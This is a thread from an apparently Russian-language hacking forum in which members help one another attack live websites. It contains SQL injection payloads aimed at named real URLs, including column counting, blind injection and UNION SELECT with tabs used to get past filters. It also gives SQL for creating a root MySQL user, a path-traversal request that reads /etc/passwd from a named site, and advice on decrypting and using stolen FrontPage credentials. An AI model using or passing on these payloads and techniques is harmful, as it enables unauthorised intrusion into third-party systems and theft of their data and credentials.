Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. KIR@PRO

    KIR@PRO from Exception

    Joined:
    26 Dec 2007
    Messages:
    826
    Likes Received:
    291
    Reputations:
    359
    спасибо много нового узнал но так ни че с этим и не получилось я раззстроен... всем спасибо за помощь
     
    _________________________
  2. Red_Red1

    Red_Red1 Banned

    Joined:
    12 Jan 2007
    Messages:
    246
    Likes Received:
    258
    Reputations:
    83
    Не могу понять
    http://www.federalspace.ru/DocDoSele.asp?DocID=46 это урл правильный
    Пробую так http://www.federalspace.ru/DocDoSele.asp?DocID=46-1
    Выдает значение эквивалентное http://www.federalspace.ru/DocDoSele.asp?DocID=45
    Дополнительно пробую http://www.federalspace.ru/DocDoSele.asp?DocID=46+order+by+16-- - ОШИБКА! order+by+15-- ВСЕ НОРМАЛЬНО!
    Делаю вывод что возможна скуль-иньект. Но выполнить иньекцию не выходит :( Почему так?
    В других скриптах на этом сайте похожая ситуация.
     
    1 person likes this.
  3. Fata1ex

    Fata1ex Elder - Старейшина

    Joined:
    12 Dec 2006
    Messages:
    703
    Likes Received:
    300
    Reputations:
    38
    Ордер выдает что полей 15 а униону пофек ^^
     
  4. A2GIL

    A2GIL Elder - Старейшина

    Joined:
    31 Aug 2007
    Messages:
    84
    Likes Received:
    59
    Reputations:
    -3
    Ага, там стоит старая бд! Так что придется делать инъект в слепую...
    select то работает:
    http://www.federalspace.ru/DocDoSele.asp?DocID=46%20and%201=(select 1)-- :)
     
  5. Welemir

    Welemir Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    229
    Likes Received:
    11
    Reputations:
    -4
    Собсна,вопрос: Как создать пользователя в бд с правами рута,если есть доступ к mysql.user?
     
  6. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    GRANT ALL PRIVILEGES ON *.* TO xek@% IDENTIFIED BY "пароль" WITH GRANT OPTION

    или

    INSERT INTO user VALUES("%","xek",PASSWORD("пароль"),"Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y");
     
  7. Welemir

    Welemir Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    229
    Likes Received:
    11
    Reputations:
    -4
    news.php?id=850+union+select+0,1,2,3,4,GRANT+ALL+PRIVILEGES+ON+*.*+TO+0xek@%+IDENTIFIED+BY+"пароль"+WITH+GRANT+OPTION,6,7+from+mysql.user/*

    таг?) откуда столько Y :pP
     
  8. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    не получится, если идет select ты никак не проведешь update или любой другой запрос кроме select и union select
     
  9. PunkAss

    PunkAss New Member

    Joined:
    19 Jan 2008
    Messages:
    9
    Likes Received:
    1
    Reputations:
    5
    Такая проблемка, в MSSQL обычная инъекция /rating.asp?sender=1'
    sender при вводе фильтруется на пробел, плюс и дефис. Пробел заменил на таб %09, не знаю что с дефисом сделать. А без него не закомментить ненужную часть запроса,
    там остаётся: ' order by blablabla
    Другой комент /* выдаёт ошибку, # тоже не коментит =\

    Например
    Code:
    sender=5'%09UNION%09SELECT%09*%09FROM%09INFORMATION_SCHEMA.TABLES%23
    вызывает ошибку

    Microsoft OLE DB Provider for SQL Server ошибка '80040e14'
    Unclosed quotation mark after the character string ' group by sender'.

    т.е. строка получается:
    Code:
    INFORMATION_SCHEMA.TABLES#' group by sender'.
    Можно это как-то обойти?
     
    1 person likes this.
  10. Macro

    Macro Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    552
    Likes Received:
    298
    Reputations:
    207
    Можно. Просто сделать второй юнион :)
     
    1 person likes this.
  11. PunkAss

    PunkAss New Member

    Joined:
    19 Jan 2008
    Messages:
    9
    Likes Received:
    1
    Reputations:
    5
    пробовал, но ещё бы я знал названия таблиц и колнок :confused:
     
  12. Macro

    Macro Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    552
    Likes Received:
    298
    Reputations:
    207
    Ну information_schema должна быть.
    Code:
    script.asp?sender=1'%09union%09select%09*%09from%09information_schema.tables%09union%09select%09null
    
    Что-то типа того
     
    1 person likes this.
  13. PunkAss

    PunkAss New Member

    Joined:
    19 Jan 2008
    Messages:
    9
    Likes Received:
    1
    Reputations:
    5
    Блин, никак не канает :mad:
    Узнал по ошибкам, что таблица rating, есть колонки ID и Sender.
    Code:
    =5'%09UNION%09SELECT%09sender%09FROM%09rating%09WHERE%09'1'='1
    ошибка:
    Column 'rating.Sender' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

    т.е. запрос "SELECT sender FROM rating WHERE '1'='1' group by sender" не канает... хз какой там оригинальный запрос :(
     
  14. Momiji

    Momiji Elder - Старейшина

    Joined:
    25 Aug 2007
    Messages:
    495
    Likes Received:
    348
    Reputations:
    127
    1.Как можно извернуться в случае если фильтруется (хз как назвать) слово select, как только пишешь в запрос
    ?id=6+union+select
    сразу появляется:
    Code:
    Precondition Failed
    The request was not completed due to preconditions that are set in the request header.
    
    Preconditions prevent the requested method from being applied to a resource other than the one intended.
    2. И что еще делать если отсутствуют выводимые поля?
     
    #734 Momiji, 20 Jan 2008
    Last edited: 20 Jan 2008
  15. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    2Momiji

    1. Не могу сказать точно, но думаю что на серваке стоит mod_security, если это так, то имхо бесполезно
    2. почитай про Blind sql инъекции, на ачате полно статей и ответов на этот вопрос

    2PunkAss

    имхо фигню делаешь, кроме того что в mssql возможно разделение запросов, ты union select неправильно используешь, да и вобще, если очень надо кидай сюда ссыль посмотрим
     
  16. PunkAss

    PunkAss New Member

    Joined:
    19 Jan 2008
    Messages:
    9
    Likes Received:
    1
    Reputations:
    5
    http://cleverclub.nashe.ru/rating_d.asp?sender=1'

    Да вся проблема правильно закончить свой запрос, чтобы в итоге общий был верный. Плохо скуль знаю, научите :p
     
  17. Tyc00n

    Tyc00n Elder - Старейшина

    Joined:
    13 Jan 2007
    Messages:
    30
    Likes Received:
    25
    Reputations:
    -1
    На некоторых фтп есть папка , _vti_pvt, там есть файл servise.psw , а нём логин и пароль, от чего они ?
     
  18. Maxyks

    Maxyks Banned

    Joined:
    8 Sep 2007
    Messages:
    174
    Likes Received:
    288
    Reputations:
    20
    FrontPage
     
    1 person likes this.
  19. Lesnoy_chelovek

    Lesnoy_chelovek Elder - Старейшина

    Joined:
    6 Dec 2006
    Messages:
    224
    Likes Received:
    152
    Reputations:
    8
    Tyc00n, я хочу неменого уточнить ответ Nea7, там пароли от содениения с узлом с помощью FrontPage. То есть тебе достаточно их расшифровать и вставить в свою версию FP. Далее можешь спокойно логинится к сайту.
     
    2 people like this.
  20. Fuckel

    Fuckel Banned

    Joined:
    16 Jan 2008
    Messages:
    274
    Likes Received:
    59
    Reputations:
    6
    http://www.biotechcenter.org/include/down.php?filename=../../../../etc/passwd
    как можно получить пассы если не получается залогиниться на сервере, расшифровать ))? что еще можно с этого взять?
     
Thread Status:
Not open for further replies.